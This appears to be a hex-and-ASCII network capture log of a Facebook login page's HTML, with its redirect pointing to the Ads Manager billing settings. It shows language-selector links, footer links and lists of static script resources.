                                                                                                                                  2022-10-17 20:07:24 UTC1658INData Raw: 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 66 72 5f 46 52 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 66 72 2d 66 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70
                                                                                                                                  Data Ascii: k.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_US&quot;, &quot;https:\/\/fr-fr.facebook.com\/login.php?next=http
                                                                                                                                  2022-10-17 20:07:24 UTC1660INData Raw: 72 74 75 67 61 6c 29 22 3e 50 6f 72 74 75 67 75 c3 aa 73 20 28 50 6f 72 74 75 67 61 6c 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 71 2d 61 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61
                                                                                                                                  Data Ascii: rtugal)">Portugus (Portugal)</a></li><li><a class="_sv4" dir="ltr" href="https://sq-al.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLoca
                                                                                                                                  2022-10-17 20:07:24 UTC1661INData Raw: 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 36 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 54 75 72 6b 69 73 68 22 3e 54 c3 bc 72 6b c3 a7 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 72 74 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 2d 61 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c
                                                                                                                                  Data Ascii: ot;, &quot;www_list_selector&quot;, 6); return false;" title="Turkish">Trke</a></li><li><a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" oncl
                                                                                                                                  2022-10-17 20:07:24 UTC1662INData Raw: 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 39 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 53 69 6d 70 6c 69 66 69 65 64 20 43 68 69 6e 65 73 65 20 28 43 68 69 6e 61 29 22 3e e4 b8 ad e6 96 87 28 e7 ae 80 e4 bd 93 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 31 37 69 20 5f 35 31 37 68 20 5f 35 31 73 79 22 20 72 65 6c 3d 22 64 69 61 6c 6f 67 22 20 61 6a 61 78 69 66
                                                                                                                                  Data Ascii: u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 9); return false;" title="Simplified Chinese (China)">()</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxif
                                                                                                                                  2022-10-17 20:07:24 UTC1664INData Raw: 2f 77 77 77 2e 6f 63 75 6c 75 73 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 4f 63 75 6c 75 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 4f 63 75 6c 75 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 72 74 61 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 46 61 63 65 62 6f 6f 6b 20 50 6f 72 74 61 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 50 6f 72 74 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77
                                                                                                                                  Data Ascii: /www.oculus.com/" title="Learn more about Oculus" target="_blank">Oculus</a></li><li><a href="https://portal.facebook.com/" title="Learn more about Facebook Portal" target="_blank">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fw
                                                                                                                                  2022-10-17 20:07:24 UTC1665INData Raw: 6f 74 65 72 22 20 74 69 74 6c 65 3d 22 43 72 65 61 74 65 20 61 20 70 61 67 65 22 3e 43 72 65 61 74 65 20 50 61 67 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 73 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 3f 72 65 66 3d 70 66 22 20 74 69 74 6c 65 3d 22 44 65 76 65 6c 6f 70 20 6f 6e 20 6f 75 72 20 70 6c 61 74 66 6f 72 6d 2e 22 3e 44 65 76 65 6c 6f 70 65 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 63 61 72 65 65 72 73 2f 3f 72 65 66 3d 70 66 22 20 74 69 74 6c 65 3d 22 4d 61 6b 65 20 79 6f 75 72 20 6e 65 78 74 20 63 61 72 65 65 72 20 6d 6f 76 65 20 74 6f 20 6f 75 72 20 61 77 65 73 6f 6d 65 20 63 6f 6d 70 61 6e 79 2e 22 3e 43 61 72 65 65 72 73 3c 2f 61 3e
                                                                                                                                  Data Ascii: oter" title="Create a page">Create Page</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></li><li><a href="/careers/?ref=pf" title="Make your next career move to our awesome company.">Careers</a>
                                                                                                                                  2022-10-17 20:07:24 UTC1667INData Raw: 20 77 69 64 74 68 3d 22 30 22 20 68 65 69 67 68 74 3d 22 30 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 20 2f 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 48 61 73 74 65 53 75 70 70 6f 72 74 44 61 74 61 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 28 7b 22 62 78 44 61 74 61 22 3a 7b 22 38 37 35 32 33 31 22 3a 7b 22 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 79 44 5c 2f 72 5c 2f 64 34 5a 49 56 58 2d 35 43 2d 62 2e 69 63 6f 22 7d 7d 2c 22 63 6c 70 44 61 74
                                                                                                                                  Data Ascii: width="0" height="0" style="display:none" /></span></div><div style="display:none"></div><script>requireLazy(["HasteSupportData"],function(m){m.handle({"bxData":{"875231":{"uri":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/yD\/r\/d4ZIVX-5C-b.ico"}},"clpDat
                                                                                                                                  2022-10-17 20:07:24 UTC1668INData Raw: 38 34 30 38 30 39 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 6e 59 63 74 6f 54 73 72 37 61 6c 52 69 59 54 6b 22 7d 2c 22 31 38 34 38 37 34 39 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 47 73 48 39 4b 62 2d 33 57 2d 74 61 5a 43 30 41 22 7d 2c 22 31 39 30 36 38 37 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 64 49 42 69 56 76 39 62 55 44 58 6c 6d 79 6f 59 22 7d 2c 22 31 39 38 35 39 34 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 36 36 4f 6f 35 6c 59 5f 5f 35 77 55 54 70 50 48 63 22 7d 2c 22 35 35 34 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 37 30
                                                                                                                                  Data Ascii: 840809":{"result":false,"hash":"AT5nYctoTsr7alRiYTk"},"1848749":{"result":false,"hash":"AT5GsH9Kb-3W-taZC0A"},"1906871":{"result":false,"hash":"AT6dIBiVv9bUDXlmyoY"},"1985945":{"result":true,"hash":"AT66Oo5lY__5wUTpPHc"},"5541":{"result":true,"hash":"AT70
                                                                                                                                  2022-10-17 20:07:24 UTC1670INData Raw: 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 37 4d 35 34 5c 2f 79 4b 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 37 58 46 72 73 4d 5a 61 6d 76 76 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 76 47 74 32 6d 78 7a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 67 5c 2f 72 5c 2f 6c 5f 64 45 45 6c 4a 69 42 43 6f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 52 30 72 48 69 64 4c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74
                                                                                                                                  Data Ascii: ps:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i7M54\/yK\/l\/en_US\/7XFrsMZamvv.js?_nc_x=Ij3Wp8lg5Kz"},"vGt2mxz":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yg\/r\/l_dEElJiBCo.js?_nc_x=Ij3Wp8lg5Kz"},"R0rHidL":{"type":"js","src":"https:\/\/st
                                                                                                                                  2022-10-17 20:07:24 UTC1671INData Raw: 70 68 70 5c 2f 76 33 69 4c 6c 35 34 5c 2f 79 6e 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 55 39 69 37 53 4d 63 77 48 36 73 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6f 5c 2f 75 6e 79 72 6e 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 43 5c 2f 72 5c 2f 65 47 61 68 6c 57 63 78 56 6c 6e 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 65 4d 6b 4d 78 48 5a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c
                                                                                                                                  Data Ascii: php\/v3iLl54\/yn\/l\/en_US\/U9i7SMcwH6s.js?_nc_x=Ij3Wp8lg5Kz"},"o\/unyrn":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yC\/r\/eGahlWcxVln.js?_nc_x=Ij3Wp8lg5Kz"},"eMkMxHZ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\
                                                                                                                                  2022-10-17 20:07:24 UTC1673INData Raw: 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 71 31 6a 53 5a 38 63 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 48 5c 2f 72 5c 2f 46 31 6e 57 6d 57 61 42 4f 65 4f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6a 51 37 6e 5c 2f 39 6a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 57 5c 2f 72 5c 2f 79 4e 59 63 63 35 65 43 6a 75 79 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6b 4b
                                                                                                                                  Data Ascii: _x=Ij3Wp8lg5Kz"},"q1jSZ8c":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yH\/r\/F1nWmWaBOeO.js?_nc_x=Ij3Wp8lg5Kz"},"jQ7n\/9j":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yW\/r\/yNYcc5eCjuy.js?_nc_x=Ij3Wp8lg5Kz"},"kK
                                                                                                                                  2022-10-17 20:07:24 UTC1674INData Raw: 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 33 5c 2f 72 5c 2f 74 6a 51 34 46 48 5a 4e 42 5a 49 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 79 68 6d 4d 4b 66 50 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 76 43 36 34 5c 2f 79 71 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 34 5a 6a 6d 33 64 75 5a 47 72 51 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 46 4a 76 47 4b 5c 2f 6a 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74
                                                                                                                                  Data Ascii: cdn.net\/rsrc.php\/v3\/y3\/r\/tjQ4FHZNBZI.js?_nc_x=Ij3Wp8lg5Kz"},"yhmMKfP":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ivC64\/yq\/l\/en_US\/4Zjm3duZGrQ.js?_nc_x=Ij3Wp8lg5Kz"},"FJvGK\/j":{"type":"css","src":"https:\/\/static.xx.fbcdn.net
                                                                                                                                  2022-10-17 20:07:24 UTC1676INData Raw: 5c 2f 72 5c 2f 77 34 48 5f 31 59 71 67 70 4c 76 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 32 47 70 61 6b 5c 2f 31 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 65 58 75 34 5c 2f 79 31 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 58 4e 36 4d 39 6b 79 61 4b 52 58 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 69 46 75 50 62 57 68 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 61 5c 2f 72 5c 2f 72 39 78
                                                                                                                                  Data Ascii: \/r\/w4H_1YqgpLv.js?_nc_x=Ij3Wp8lg5Kz"},"2Gpak\/1":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ieXu4\/y1\/l\/en_US\/XN6M9kyaKRX.js?_nc_x=Ij3Wp8lg5Kz"},"iFuPbWh":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ya\/r\/r9x
                                                                                                                                  2022-10-17 20:07:24 UTC1677INData Raw: 5c 2f 49 30 68 4c 78 4b 73 63 6d 71 79 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 63 59 55 33 63 33 32 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 43 5c 2f 72 5c 2f 6a 51 46 6c 74 34 67 79 70 39 52 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 33 4f 67 53 4a 45 34 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 5f 5c 2f 72 5c 2f 6a 69 58 4c 74 37 7a 61 4d 49 70 2e 6a 73 3f 5f 6e 63 5f
                                                                                                                                  Data Ascii: \/I0hLxKscmqy.js?_nc_x=Ij3Wp8lg5Kz"},"cYU3c32":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yC\/r\/jQFlt4gyp9R.js?_nc_x=Ij3Wp8lg5Kz"},"3OgSJE4":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y_\/r\/jiXLt7zaMIp.js?_nc_
                                                                                                                                  2022-10-17 20:07:24 UTC1679INData Raw: 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 62 30 79 30 58 59 77 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 72 51 4c 34 5c 2f 79 59 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 47 79 74 6b 52 5a 46 4c 42 77 4d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 47 72 78 57 58 32 65 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 64 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 50 76 56 7a 58 39 45 41 4b 46 61 2e 63 73 73 3f 5f 6e 63 5f 78 3d
                                                                                                                                  Data Ascii: 3Wp8lg5Kz"},"b0y0XYw":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3irQL4\/yY\/l\/en_US\/GytkRZFLBwM.js?_nc_x=Ij3Wp8lg5Kz"},"GrxWX2e":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yd\/l\/0,cross\/PvVzX9EAKFa.css?_nc_x=
                                                                                                                                  2022-10-17 20:07:24 UTC1680INData Raw: 75 74 56 6a 51 7a 4f 57 2d 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6e 7a 41 4b 76 4c 79 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 37 5c 2f 72 5c 2f 36 57 50 4a 79 70 35 48 61 30 6a 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 57 46 4d 47 53 39 65 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 5f 6a 41 34 5c 2f 79 7a 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 61 73 43 69 42 53 75 68 62 6a
                                                                                                                                  Data Ascii: utVjQzOW-.css?_nc_x=Ij3Wp8lg5Kz"},"nzAKvLy":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y7\/r\/6WPJyp5Ha0j.js?_nc_x=Ij3Wp8lg5Kz"},"WFMGS9e":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i_jA4\/yz\/l\/en_US\/asCiBSuhbj
                                                                                                                                  2022-10-17 20:07:24 UTC1682INData Raw: 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 53 57 78 33 79 4e 76 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 57 5c 2f 72 5c 2f 4f 5f 53 6a 64 63 52 2d 78 4b 4c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 78 32 32 4f 62 79 34 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 30 5c 2f 72 5c 2f 66 4e 33 63 43 6a 37 49 6c 34 44 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d
                                                                                                                                  Data Ascii: s?_nc_x=Ij3Wp8lg5Kz"},"SWx3yNv":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yW\/r\/O_SjdcR-xKL.js?_nc_x=Ij3Wp8lg5Kz"},"x22Oby4":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y0\/r\/fN3cCj7Il4D.js?_nc_x=Ij3Wp8lg5Kz"}
                                                                                                                                  2022-10-17 20:07:24 UTC1683INData Raw: 2c 22 62 65 22 3a 31 7d 2c 22 46 6f 72 6d 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 68 79 4b 6d 70 75 75 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 46 6f 72 6d 53 75 62 6d 69 74 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 45 46 31 68 57 6c 35 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 72 68 32 4a 47 30 55 22 2c 22 68 79 4b 6d 70 75 75 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 22 72 22 3a 5b 22 2b 52 47 74 4d 30 6f 22 2c 22 6a 54 58
                                                                                                                                  Data Ascii: ,"be":1},"Form":{"r":["vcBcJjw","Z2GjVu9","vGt2mxz","hyKmpuu"],"be":1},"FormSubmit":{"r":["vcBcJjw","EF1hWl5","Z2GjVu9","n6W4xMH","vGt2mxz","rh2JG0U","hyKmpuu"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED"],"r":["+RGtM0o","jTX
